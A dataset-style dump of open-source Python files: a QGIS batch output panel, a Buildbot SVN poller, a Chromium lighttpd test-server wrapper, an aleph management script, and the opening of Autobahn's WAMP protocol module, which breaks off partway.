repo_name | path | copies | size | content | license |
|---|---|---|---|---|---|
wbyne/QGIS | python/plugins/processing/gui/BatchOutputSelectionPanel.py | 2 | 6990 | # -*- coding: utf-8 -*-
"""
***************************************************************************
BatchOutputSelectionPanel.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from __future__ import print_function
from builtins import str
from builtins import range
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import re
from qgis.PyQt.QtWidgets import QWidget, QPushButton, QLineEdit, QHBoxLayout, QSizePolicy, QFileDialog
from qgis.PyQt.QtCore import QSettings
from processing.gui.AutofillDialog import AutofillDialog
from processing.core.parameters import ParameterMultipleInput
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterTable
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterSelection
from processing.core.parameters import ParameterFixedTable
from processing.core.outputs import OutputDirectory
class BatchOutputSelectionPanel(QWidget):
def __init__(self, output, alg, row, col, panel):
super(BatchOutputSelectionPanel, self).__init__(None)
self.alg = alg
self.row = row
self.col = col
self.output = output
self.panel = panel
self.table = self.panel.tblParameters
self.horizontalLayout = QHBoxLayout(self)
self.horizontalLayout.setSpacing(2)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)  # setMargin() was removed in Qt5
self.text = QLineEdit()
self.text.setText('')
self.text.setMinimumWidth(300)
self.text.setSizePolicy(QSizePolicy.Expanding,
QSizePolicy.Expanding)
self.horizontalLayout.addWidget(self.text)
self.pushButton = QPushButton()
self.pushButton.setText('...')
self.pushButton.clicked.connect(self.showSelectionDialog)
self.horizontalLayout.addWidget(self.pushButton)
self.setLayout(self.horizontalLayout)
def showSelectionDialog(self):
if isinstance(self.output, OutputDirectory):
self.selectDirectory()
return
filefilter = self.output.getFileFilter(self.alg)
settings = QSettings()
if settings.contains('/Processing/LastBatchOutputPath'):
path = str(settings.value('/Processing/LastBatchOutputPath'))
else:
path = ''
filename, selectedFileFilter = QFileDialog.getSaveFileName(self,
self.tr('Save file'), path, filefilter)
if filename:
if not filename.lower().endswith(
tuple(re.findall("\*(\.[a-z]{1,10})", filefilter))):
ext = re.search("\*(\.[a-z]{1,10})", selectedFileFilter)
if ext:
filename += ext.group(1)
settings.setValue('/Processing/LastBatchOutputPath', os.path.dirname(filename))
dlg = AutofillDialog(self.alg)
dlg.exec_()
if dlg.mode is not None:
try:
if dlg.mode == AutofillDialog.DO_NOT_AUTOFILL:
self.table.cellWidget(self.row,
self.col).setValue(filename)
elif dlg.mode == AutofillDialog.FILL_WITH_NUMBERS:
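# append a running index before the extension, e.g. (illustrative)
# '/out/result.shp' -> '/out/result1.shp', '/out/result2.shp', ...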
n = self.table.rowCount() - self.row
for i in range(n):
name = filename[:filename.rfind('.')] \
+ str(i + 1) + filename[filename.rfind('.'):]
self.table.cellWidget(i + self.row,
self.col).setValue(name)
elif dlg.mode == AutofillDialog.FILL_WITH_PARAMETER:
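# build each row's output name from that row's value of the chosen input parameter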
n = self.table.rowCount() - self.row
for i in range(n):
widget = self.table.cellWidget(i + self.row,
dlg.param)
param = self.alg.parameters[dlg.param]
if isinstance(param, (ParameterRaster,
ParameterVector, ParameterTable,
ParameterMultipleInput)):
s = str(widget.getText())
s = os.path.basename(s)
s = os.path.splitext(s)[0]
elif isinstance(param, ParameterBoolean):
s = str(widget.currentIndex() == 0)
elif isinstance(param, ParameterSelection):
s = str(widget.currentText())
elif isinstance(param, ParameterFixedTable):
s = str(widget.table)
else:
s = str(widget.text())
name = filename[:filename.rfind('.')] + s \
+ filename[filename.rfind('.'):]
self.table.cellWidget(i + self.row,
self.col).setValue(name)
except Exception:
# a malformed value or missing cell widget leaves the remaining rows unchanged
pass
def selectDirectory(self):
settings = QSettings()
if settings.contains('/Processing/LastBatchOutputPath'):
lastDir = str(settings.value('/Processing/LastBatchOutputPath'))
else:
lastDir = ''
dirName = QFileDialog.getExistingDirectory(self,
self.tr('Select directory'), lastDir, QFileDialog.ShowDirsOnly)
if dirName:
self.table.cellWidget(self.row, self.col).setValue(dirName)
settings.setValue('/Processing/LastBatchOutputPath', dirName)
def setValue(self, text):
return self.text.setText(text)
def getValue(self):
return str(self.text.text())
| gpl-2.0 |
shoelzer/buildbot | master/buildbot/changes/svnpoller.py | 6 | 17985 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
# Based on the work of Dave Peticolas for the P4poll
# Changed to svn (using xml.dom.minidom) by Niklaus Giger
# Hacked beyond recognition by Brian Warner
from __future__ import absolute_import
from __future__ import print_function
from future.moves.urllib.parse import quote_plus as urlquote_plus
from future.utils import text_type
import os
import xml.dom.minidom
from twisted.internet import defer
from twisted.internet import utils
from twisted.python import log
from buildbot import util
from buildbot.changes import base
from buildbot.util import bytes2NativeString
from buildbot.util import bytes2unicode
# these split_file_* functions are available for use as values to the
# split_file= argument.
def split_file_alwaystrunk(path):
return dict(path=path)
def split_file_branches(path):
# turn "trunk/subdir/file.c" into (None, "subdir/file.c")
# and "trunk/subdir/" into (None, "subdir/")
# and "trunk/" into (None, "")
# and "branches/1.5.x/subdir/file.c" into ("branches/1.5.x", "subdir/file.c")
# and "branches/1.5.x/subdir/" into ("branches/1.5.x", "subdir/")
# and "branches/1.5.x/" into ("branches/1.5.x", "")
pieces = path.split('/')
if len(pieces) > 1 and pieces[0] == 'trunk':
return (None, '/'.join(pieces[1:]))
elif len(pieces) > 2 and pieces[0] == 'branches':
return ('/'.join(pieces[0:2]), '/'.join(pieces[2:]))
else:
return None
def split_file_projects_branches(path):
# turn projectname/trunk/subdir/file.c into dict(project=projectname,
# branch=trunk, path=subdir/file.c)
if "/" not in path:
return None
project, path = path.split("/", 1)
f = split_file_branches(path)
if f:
info = dict(project=project, path=f[1])
if f[0]:
info['branch'] = f[0]
return info
return f
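# For example (illustrative path):
# split_file_projects_branches('calc/branches/1.5.x/src/main.c')
# => {'project': 'calc', 'branch': 'branches/1.5.x', 'path': 'src/main.c'}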
class SVNPoller(base.PollingChangeSource, util.ComparableMixin):
"""
Poll a Subversion repository for changes and submit them to the change
master.
"""
compare_attrs = ("repourl", "split_file",
"svnuser", "svnpasswd", "project",
"pollInterval", "histmax",
"svnbin", "category", "cachepath", "pollAtLaunch")
parent = None # filled in when we're added
last_change = None
loop = None
def __init__(self, repourl, split_file=None,
svnuser=None, svnpasswd=None,
pollInterval=10 * 60, histmax=100,
svnbin='svn', revlinktmpl='', category=None,
project='', cachepath=None, pollinterval=-2,
extra_args=None, name=None, pollAtLaunch=False):
# for backward compatibility; the parameter used to be spelled with 'i'
if pollinterval != -2:
pollInterval = pollinterval
if name is None:
name = repourl
base.PollingChangeSource.__init__(self, name=name,
pollInterval=pollInterval,
pollAtLaunch=pollAtLaunch)
if repourl.endswith("/"):
repourl = repourl[:-1] # strip the trailing slash
self.repourl = repourl
self.extra_args = extra_args
self.split_file = split_file or split_file_alwaystrunk
self.svnuser = svnuser
self.svnpasswd = svnpasswd
self.revlinktmpl = revlinktmpl
# include environment variables required for ssh-agent auth
self.environ = os.environ.copy()
self.svnbin = svnbin
self.histmax = histmax
self._prefix = None
self.category = category if callable(
category) else util.ascii2unicode(category)
self.project = util.ascii2unicode(project)
self.cachepath = cachepath
if self.cachepath and os.path.exists(self.cachepath):
try:
with open(self.cachepath, "r") as f:
self.last_change = int(f.read().strip())
log.msg("SVNPoller: SVNPoller(%s) setting last_change to %s" % (
self.repourl, self.last_change))
# try writing it, too
with open(self.cachepath, "w") as f:
f.write(str(self.last_change))
except Exception:
self.cachepath = None
log.msg(("SVNPoller: SVNPoller(%s) cache file corrupt or unwriteable; " +
"skipping and not using") % self.repourl)
log.err()
def describe(self):
return "SVNPoller: watching %s" % self.repourl
def poll(self):
# Our return value is only used for unit testing.
# we need to figure out the repository root, so we can figure out
# repository-relative pathnames later. Each REPOURL is in the form
# (ROOT)/(PROJECT)/(BRANCH)/(FILEPATH), where (ROOT) is something
# like svn://svn.twistedmatrix.com/svn/Twisted (i.e. there is a
# physical repository at /svn/Twisted on that host), (PROJECT) is
# something like Projects/Twisted (i.e. within the repository's
# internal namespace, everything under Projects/Twisted/ has
# something to do with Twisted, but these directory names do not
# actually appear on the repository host), (BRANCH) is something like
# "trunk" or "branches/2.0.x", and (FILEPATH) is a tree-relative
# filename like "twisted/internet/defer.py".
# our self.repourl attribute contains (ROOT)/(PROJECT) combined
# together in a way that we can't separate without svn's help. If the
# user is not using the split_file= argument, then self.repourl might
# be (ROOT)/(PROJECT)/(BRANCH) . In any case, the filenames we will
# get back from 'svn log' will be of the form
# (PROJECT)/(BRANCH)/(FILEPATH), but we want to be able to remove
# that (PROJECT) prefix from them. To do this without requiring the
# user to tell us how repourl is split into ROOT and PROJECT, we do an
# 'svn info --xml' command at startup. This command will include a
# <root> element that tells us ROOT. We then strip this prefix from
# self.repourl to determine PROJECT, and then later we strip the
# PROJECT prefix from the filenames reported by 'svn log --xml' to
# get a (BRANCH)/(FILEPATH) that can be passed to split_file() to
# turn into separate BRANCH and FILEPATH values.
# whew.
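# A concrete (illustrative) example: with
# repourl = svn://svn.example.org/svn/repo/Projects/Foo
# and `svn info --xml` reporting root = svn://svn.example.org/svn/repo,
# the computed prefix is 'Projects/Foo'; a logged path such as
# 'Projects/Foo/trunk/bar.c' is then stripped to 'trunk/bar.c' before
# being handed to split_file().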
if self.project:
log.msg("SVNPoller: polling " + self.project)
else:
log.msg("SVNPoller: polling")
d = defer.succeed(None)
if not self._prefix:
d.addCallback(lambda _: self.get_prefix())
@d.addCallback
def set_prefix(prefix):
self._prefix = prefix
d.addCallback(self.get_logs)
d.addCallback(self.parse_logs)
d.addCallback(self.get_new_logentries)
d.addCallback(self.create_changes)
d.addCallback(self.submit_changes)
d.addCallback(self.finished_ok)
# eat errors
d.addErrback(log.err, 'SVNPoller: Error while polling')
return d
def getProcessOutput(self, args):
# this exists so we can override it during the unit tests
d = utils.getProcessOutput(self.svnbin, args, self.environ)
return d
def get_prefix(self):
args = ["info", "--xml", "--non-interactive", self.repourl]
if self.svnuser:
args.append("--username=%s" % self.svnuser)
if self.svnpasswd is not None:
args.append("--password=%s" % self.svnpasswd)
if self.extra_args:
args.extend(self.extra_args)
d = self.getProcessOutput(args)
@d.addCallback
def determine_prefix(output):
try:
doc = xml.dom.minidom.parseString(output)
except xml.parsers.expat.ExpatError:
log.msg("SVNPoller: SVNPoller.get_prefix: ExpatError in '%s'"
% output)
raise
rootnodes = doc.getElementsByTagName("root")
if not rootnodes:
# this happens if the URL we gave was already the root. In this
# case, our prefix is empty.
self._prefix = ""
return self._prefix
rootnode = rootnodes[0]
root = "".join([c.data for c in rootnode.childNodes])
# root will be a unicode string
if not self.repourl.startswith(root):
log.msg(format="Got root %(root)r from `svn info`, but it is "
"not a prefix of the configured repourl",
repourl=self.repourl, root=root)
raise RuntimeError("Configured repourl doesn't match svn root")
prefix = self.repourl[len(root):]
if prefix.startswith("/"):
prefix = prefix[1:]
log.msg("SVNPoller: repourl=%s, root=%s, so prefix=%s" %
(self.repourl, root, prefix))
return prefix
return d
def get_logs(self, _):
args = []
args.extend(["log", "--xml", "--verbose", "--non-interactive"])
if self.svnuser:
args.extend(["--username=%s" % self.svnuser])
if self.svnpasswd is not None:
args.extend(["--password=%s" % self.svnpasswd])
if self.extra_args:
args.extend(self.extra_args)
args.extend(["--limit=%d" % (self.histmax), self.repourl])
d = self.getProcessOutput(args)
return d
def parse_logs(self, output):
# parse the XML output, return a list of <logentry> nodes
try:
doc = xml.dom.minidom.parseString(output)
except xml.parsers.expat.ExpatError:
log.msg(
"SVNPoller: SVNPoller.parse_logs: ExpatError in '%s'" % output)
raise
logentries = doc.getElementsByTagName("logentry")
return logentries
def get_new_logentries(self, logentries):
last_change = old_last_change = self.last_change
# given a list of logentries, calculate new_last_change, and
# new_logentries, where new_logentries contains only the ones after
# last_change
new_last_change = None
new_logentries = []
if logentries:
new_last_change = int(logentries[0].getAttribute("revision"))
if last_change is None:
# if this is the first time we've been run, ignore any changes
# that occurred before now. This prevents a build at every
# startup.
log.msg('SVNPoller: starting at change %s' % new_last_change)
elif last_change == new_last_change:
# an unmodified repository will hit this case
log.msg('SVNPoller: no changes')
else:
for el in logentries:
if last_change == int(el.getAttribute("revision")):
break
new_logentries.append(el)
new_logentries.reverse() # return oldest first
self.last_change = new_last_change
log.msg('SVNPoller: _process_changes %s .. %s' %
(old_last_change, new_last_change))
return new_logentries
def _get_text(self, element, tag_name):
try:
child_nodes = element.getElementsByTagName(tag_name)[0].childNodes
text = "".join([t.data for t in child_nodes])
except IndexError:
text = "unknown"
return text
def _transform_path(self, path):
if not path.startswith(self._prefix):
log.msg(format="SVNPoller: ignoring path '%(path)s' which doesn't"
"start with prefix '%(prefix)s'",
path=path, prefix=self._prefix)
return
relative_path = path[len(self._prefix):]
if relative_path.startswith("/"):
relative_path = relative_path[1:]
where = self.split_file(relative_path)
# 'where' is either None, (branch, final_path) or a dict
if not where:
return
if isinstance(where, tuple):
where = dict(branch=where[0], path=where[1])
return where
def create_changes(self, new_logentries):
changes = []
for el in new_logentries:
revision = text_type(el.getAttribute("revision"))
revlink = u''
if self.revlinktmpl and revision:
revlink = self.revlinktmpl % urlquote_plus(revision)
revlink = text_type(revlink)
log.msg("Adding change revision %s" % (revision,))
author = self._get_text(el, "author")
comments = self._get_text(el, "msg")
# there is a "date" field, but it provides localtime in the
# repository's timezone, whereas we care about buildmaster's
# localtime (since this will get used to position the boxes on
# the Waterfall display, etc). So ignore the date field, and
# addChange will fill in with the current time
branches = {}
try:
pathlist = el.getElementsByTagName("paths")[0]
except IndexError: # weird, we got an empty revision
log.msg("ignoring commit with no paths")
continue
for p in pathlist.getElementsByTagName("path"):
kind = p.getAttribute("kind")
action = p.getAttribute("action")
path = "".join([t.data for t in p.childNodes])
# Convert the path from unicode to bytes
path = path.encode("ascii")
# Convert path from bytes to native string. Needed for Python 3.
path = bytes2NativeString(path, "ascii")
if path.startswith("/"):
path = path[1:]
if kind == "dir" and not path.endswith("/"):
path += "/"
where = self._transform_path(path)
# if 'where' is None, the file was outside any project that
# we care about and we should ignore it
if where:
branch = where.get("branch", None)
filename = where["path"]
if branch not in branches:
branches[branch] = {
'files': [], 'number_of_directories': 0}
if filename == "":
# root directory of branch
branches[branch]['files'].append(filename)
branches[branch]['number_of_directories'] += 1
elif filename.endswith("/"):
# subdirectory of branch
branches[branch]['files'].append(filename[:-1])
branches[branch]['number_of_directories'] += 1
else:
branches[branch]['files'].append(filename)
if "action" not in branches[branch]:
branches[branch]['action'] = action
for key in ("repository", "project", "codebase"):
if key in where:
branches[branch][key] = where[key]
for branch in branches:
action = branches[branch]['action']
files = branches[branch]['files']
number_of_directories_changed = branches[
branch]['number_of_directories']
number_of_files_changed = len(files)
if action == u'D' and number_of_directories_changed == 1 and number_of_files_changed == 1 and files[0] == '':
log.msg("Ignoring deletion of branch '%s'" % branch)
else:
chdict = dict(
author=author,
# weakly assume filenames are utf-8
files=[bytes2unicode(f, 'utf-8', 'replace') for f in files],
comments=comments,
revision=revision,
branch=util.ascii2unicode(branch),
revlink=revlink,
category=self.category,
repository=util.ascii2unicode(
branches[branch].get('repository', self.repourl)),
project=util.ascii2unicode(
branches[branch].get('project', self.project)),
codebase=util.ascii2unicode(
branches[branch].get('codebase', None)))
changes.append(chdict)
return changes
@defer.inlineCallbacks
def submit_changes(self, changes):
for chdict in changes:
yield self.master.data.updates.addChange(src=u'svn', **chdict)
def finished_ok(self, res):
if self.cachepath:
with open(self.cachepath, "w") as f:
f.write(str(self.last_change))
log.msg("SVNPoller: finished polling %s" % res)
return res
| gpl-2.0 |
wuhengzhi/chromium-crosswalk | build/android/lighttpd_server.py | 30 | 9449 | #!/usr/bin/env python
#
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides a convenient wrapper for spawning a test lighttpd instance.
Usage:
lighttpd_server PATH_TO_DOC_ROOT
"""
import codecs
import contextlib
import httplib
import os
import random
import shutil
import socket
import subprocess
import sys
import tempfile
import time
from pylib import constants
from pylib import pexpect
class LighttpdServer(object):
"""Wraps lighttpd server, providing robust startup.
Args:
document_root: Path to root of this server's hosted files.
port: TCP port on the _host_ machine that the server will listen on. If
omitted it will attempt to use 9000, or if unavailable it will find
a free port from 8001 - 8999.
lighttpd_path, lighttpd_module_path: Optional paths to lighttpd binaries.
base_config_path: If supplied this file will replace the built-in default
lighttpd config file.
extra_config_contents: If specified, this string will be appended to the
base config (default built-in, or from base_config_path).
config_path, error_log, access_log: Optional paths where the class should
place temporary files for this session.
"""
def __init__(self, document_root, port=None,
lighttpd_path=None, lighttpd_module_path=None,
base_config_path=None, extra_config_contents=None,
config_path=None, error_log=None, access_log=None):
self.temp_dir = tempfile.mkdtemp(prefix='lighttpd_for_chrome_android')
self.document_root = os.path.abspath(document_root)
self.fixed_port = port
self.port = port or constants.LIGHTTPD_DEFAULT_PORT
self.server_tag = 'LightTPD ' + str(random.randint(111111, 999999))
self.lighttpd_path = lighttpd_path or '/usr/sbin/lighttpd'
self.lighttpd_module_path = lighttpd_module_path or '/usr/lib/lighttpd'
self.base_config_path = base_config_path
self.extra_config_contents = extra_config_contents
self.config_path = config_path or self._Mktmp('config')
self.error_log = error_log or self._Mktmp('error_log')
self.access_log = access_log or self._Mktmp('access_log')
self.pid_file = self._Mktmp('pid_file')
self.process = None
def _Mktmp(self, name):
return os.path.join(self.temp_dir, name)
@staticmethod
def _GetRandomPort():
# The port range for the test server is defined in constants.py.
return random.randint(constants.LIGHTTPD_RANDOM_PORT_FIRST,
constants.LIGHTTPD_RANDOM_PORT_LAST)
def StartupHttpServer(self):
"""Starts up a http server with specified document root and port."""
# If we want a specific port, make sure no one else is listening on it.
if self.fixed_port:
self._KillProcessListeningOnPort(self.fixed_port)
while True:
if self.base_config_path:
# Read the config
with codecs.open(self.base_config_path, 'r', 'utf-8') as f:
config_contents = f.read()
else:
config_contents = self._GetDefaultBaseConfig()
if self.extra_config_contents:
config_contents += self.extra_config_contents
# Write out the config, filling in placeholders from the members of |self|
with codecs.open(self.config_path, 'w', 'utf-8') as f:
f.write(config_contents % self.__dict__)
if (not os.path.exists(self.lighttpd_path) or
not os.access(self.lighttpd_path, os.X_OK)):
raise EnvironmentError(
'Could not find lighttpd at %s.\n'
'It may need to be installed (e.g. sudo apt-get install lighttpd)'
% self.lighttpd_path)
self.process = pexpect.spawn(self.lighttpd_path,
['-D', '-f', self.config_path,
'-m', self.lighttpd_module_path],
cwd=self.temp_dir)
client_error, server_error = self._TestServerConnection()
if not client_error:
assert int(open(self.pid_file, 'r').read()) == self.process.pid
break
self.process.close()
if self.fixed_port or 'in use' not in server_error:
print 'Client error:', client_error
print 'Server error:', server_error
return False
self.port = self._GetRandomPort()
return True
def ShutdownHttpServer(self):
"""Shuts down our lighttpd processes."""
if self.process:
self.process.terminate()
shutil.rmtree(self.temp_dir, ignore_errors=True)
def _TestServerConnection(self):
# Wait for server to start
server_msg = ''
for timeout in xrange(1, 5):
client_error = None
try:
with contextlib.closing(httplib.HTTPConnection(
'127.0.0.1', self.port, timeout=timeout)) as http:
http.set_debuglevel(timeout > 3)
http.request('HEAD', '/')
r = http.getresponse()
r.read()
if (r.status == 200 and r.reason == 'OK' and
r.getheader('Server') == self.server_tag):
return (None, server_msg)
client_error = ('Bad response: %s %s version %s\n ' %
(r.status, r.reason, r.version) +
'\n '.join([': '.join(h) for h in r.getheaders()]))
except (httplib.HTTPException, socket.error) as client_error:
pass # Probably too quick connecting: try again
# Check for server startup error messages
ix = self.process.expect([pexpect.TIMEOUT, pexpect.EOF, '.+'],
timeout=timeout)
if ix == 2: # stdout spew from the server
server_msg += self.process.match.group(0) # pylint: disable=no-member
elif ix == 1: # EOF -- server has quit, so give up.
client_error = client_error or 'Server exited'
break
return (client_error or 'Timeout', server_msg)
@staticmethod
def _KillProcessListeningOnPort(port):
"""Checks if there is a process listening on port number |port| and
terminates it if found.
Args:
port: Port number to check.
"""
if subprocess.call(['fuser', '-kv', '%d/tcp' % port]) == 0:
# Give the process some time to terminate and check that it is gone.
time.sleep(2)
assert subprocess.call(['fuser', '-v', '%d/tcp' % port]) != 0, \
'Unable to kill process listening on port %d.' % port
@staticmethod
def _GetDefaultBaseConfig():
return """server.tag = "%(server_tag)s"
server.modules = ( "mod_access",
"mod_accesslog",
"mod_alias",
"mod_cgi",
"mod_rewrite" )
# default document root required
#server.document-root = "."
# files to check for if .../ is requested
index-file.names = ( "index.php", "index.pl", "index.cgi",
"index.html", "index.htm", "default.htm" )
# mimetype mapping
mimetype.assign = (
".gif" => "image/gif",
".jpg" => "image/jpeg",
".jpeg" => "image/jpeg",
".png" => "image/png",
".svg" => "image/svg+xml",
".css" => "text/css",
".html" => "text/html",
".htm" => "text/html",
".xhtml" => "application/xhtml+xml",
".xhtmlmp" => "application/vnd.wap.xhtml+xml",
".js" => "application/x-javascript",
".log" => "text/plain",
".conf" => "text/plain",
".text" => "text/plain",
".txt" => "text/plain",
".dtd" => "text/xml",
".xml" => "text/xml",
".manifest" => "text/cache-manifest",
)
# Use the "Content-Type" extended attribute to obtain mime type if possible
mimetype.use-xattr = "enable"
##
# which extensions should not be handle via static-file transfer
#
# .php, .pl, .fcgi are most often handled by mod_fastcgi or mod_cgi
static-file.exclude-extensions = ( ".php", ".pl", ".cgi" )
server.bind = "127.0.0.1"
server.port = %(port)s
## virtual directory listings
dir-listing.activate = "enable"
#dir-listing.encoding = "iso-8859-2"
#dir-listing.external-css = "style/oldstyle.css"
## enable debugging
#debug.log-request-header = "enable"
#debug.log-response-header = "enable"
#debug.log-request-handling = "enable"
#debug.log-file-not-found = "enable"
#### SSL engine
#ssl.engine = "enable"
#ssl.pemfile = "server.pem"
# Autogenerated test-specific config follows.
cgi.assign = ( ".cgi" => "/usr/bin/env",
".pl" => "/usr/bin/env",
".asis" => "/bin/cat",
".php" => "/usr/bin/php-cgi" )
server.errorlog = "%(error_log)s"
accesslog.filename = "%(access_log)s"
server.upload-dirs = ( "/tmp" )
server.pid-file = "%(pid_file)s"
server.document-root = "%(document_root)s"
"""
def main(argv):
server = LighttpdServer(*argv[1:])
try:
if server.StartupHttpServer():
raw_input('Server running at http://127.0.0.1:%s -'
' press Enter to exit it.' % server.port)
else:
print 'Server exit code:', server.process.exitstatus
finally:
server.ShutdownHttpServer()
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
mgax/aleph | aleph/manage.py | 3 | 1527 | from flask.ext.script import Manager
from flask.ext.assets import ManageAssets
from flask.ext.migrate import MigrateCommand
from aleph.core import archive
from aleph.model import db, CrawlState
from aleph.views import app, assets
from aleph.processing import make_pipeline, process_collection
from aleph.crawlers import crawl_source
from aleph.upgrade import upgrade as upgrade_, reset as reset_
manager = Manager(app)
manager.add_command('assets', ManageAssets(assets))
manager.add_command('db', MigrateCommand)
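# Typical invocations (illustrative; Flask-Script turns keyword arguments
# with boolean defaults into optional flags such as --force):
#
# python aleph/manage.py crawl <source>
# python aleph/manage.py process <collection_name> --force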
@manager.command
def crawl(source, force=False):
""" Execute the crawler for a given source specification. """
crawl_source(source, ignore_tags=force)
@manager.command
def flush(source):
""" Reset the crawler state for a given source specification. """
CrawlState.flush(source)
db.session.commit()
@manager.command
def process(collection_name, force=False):
""" Index all documents in the given collection. """
process_collection.delay(collection_name, overwrite=force)
@manager.command
def fixture(name):
""" Load a list fixture. """
# TODO: replace this whole thing with something more frameworky
from aleph.processing.fixtures import load_fixture
load_fixture(name)
@manager.command
def reset():
""" Delete and re-create the search index and database. """
reset_()
@manager.command
def upgrade():
""" Create or upgrade the search index and database. """
upgrade_()
def main():
manager.run()
if __name__ == "__main__":
main()
| mit |
markope/AutobahnPython | autobahn/wamp/protocol.py | 1 | 57431 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import six
import txaio
import inspect
from autobahn import wamp
from autobahn.wamp import uri
from autobahn.wamp import message
from autobahn.wamp import types
from autobahn.wamp import role
from autobahn.wamp import exception
from autobahn.wamp.exception import ApplicationError, ProtocolError, SessionNotReady, SerializationError
from autobahn.wamp.interfaces import IApplicationSession # noqa
from autobahn.wamp.types import SessionDetails
from autobahn.wamp.keyring import EncryptedPayload
from autobahn.util import IdGenerator, ObservableMixin
from autobahn.wamp.request import \
Publication, \
Subscription, \
Handler, \
Registration, \
Endpoint, \
PublishRequest, \
SubscribeRequest, \
UnsubscribeRequest, \
CallRequest, \
InvocationRequest, \
RegisterRequest, \
UnregisterRequest
def is_method_or_function(f):
return inspect.ismethod(f) or inspect.isfunction(f)
class BaseSession(ObservableMixin):
"""
WAMP session base class.
This class implements :class:`autobahn.wamp.interfaces.ISession`.
"""
def __init__(self):
"""
"""
ObservableMixin.__init__(self)
# this is for library level debugging
self.debug = False
# this is for app level debugging. exceptions raised in user code
# will get logged (that is, when invoking remoted procedures or
# when invoking event handlers)
self.debug_app = False
# this is for marshalling traceback from exceptions thrown in user
# code within WAMP error messages (that is, when invoking remoted
# procedures)
self.traceback_app = False
# mapping of exception classes to WAMP error URIs
self._ecls_to_uri_pat = {}
# mapping of WAMP error URIs to exception classes
self._uri_to_ecls = {
ApplicationError.INVALID_PAYLOAD: SerializationError
}
# session authentication information
self._authid = None
self._authrole = None
self._authmethod = None
self._authprovider = None
# end-to-end encryption keyring
self._keyring = None
# generator for WAMP request IDs
self._request_id_gen = IdGenerator()
def define(self, exception, error=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.define`
"""
if error is None:
assert(hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = exception._wampuris
self._uri_to_ecls[exception._wampuris[0].uri()] = exception
else:
assert(not hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = [uri.Pattern(six.u(error), uri.Pattern.URI_TARGET_HANDLER)]
self._uri_to_ecls[six.u(error)] = exception
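# Illustrative sketch (the exception class and error URI are assumptions):
#
# class AppError(Exception):
# pass
#
# session.define(AppError, error=u'com.example.error.app')
#
# After this, ERROR messages carrying that URI are raised as AppError, and
# AppError raised in endpoints is mapped back to the URI.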
def _message_from_exception(self, request_type, request, exc, tb=None, enc_algo=None):
"""
Create a WAMP error message from an exception.
:param request_type: The request type this WAMP error message is for.
:type request_type: int
:param request: The request ID this WAMP error message is for.
:type request: int
:param exc: The exception.
:type exc: Instance of :class:`Exception` or subclass thereof.
:param tb: Optional traceback. If present, it'll be included with the WAMP error message.
:type tb: list or None
"""
assert(enc_algo is None or enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX)
args = None
if hasattr(exc, 'args'):
args = list(exc.args) # make sure tuples are made into lists
kwargs = None
if hasattr(exc, 'kwargs'):
kwargs = exc.kwargs
if tb:
if kwargs:
kwargs['traceback'] = tb
else:
kwargs = {'traceback': tb}
if isinstance(exc, exception.ApplicationError):
error = exc.error if type(exc.error) == six.text_type else six.u(exc.error)
else:
if exc.__class__ in self._ecls_to_uri_pat:
error = self._ecls_to_uri_pat[exc.__class__][0]._uri
else:
error = u"wamp.error.runtime_error"
encrypted_payload = None
if self._keyring:
encrypted_payload = self._keyring.encrypt(False, error, args, kwargs)
if encrypted_payload:
msg = message.Error(request_type,
request,
error,
payload=encrypted_payload.payload,
enc_algo=encrypted_payload.algo,
enc_key=encrypted_payload.pkey,
enc_serializer=encrypted_payload.serializer)
else:
msg = message.Error(request_type,
request,
error,
args,
kwargs)
return msg
def _exception_from_message(self, msg):
"""
Create a user (or generic) exception from a WAMP error message.
:param msg: A WAMP error message.
:type msg: instance of :class:`autobahn.wamp.message.Error`
"""
# FIXME:
# 1. map to ecls based on error URI wildcard/prefix
# 2. extract additional args/kwargs from error URI
exc = None
enc_err = None
if msg.enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX:
if not self._keyring:
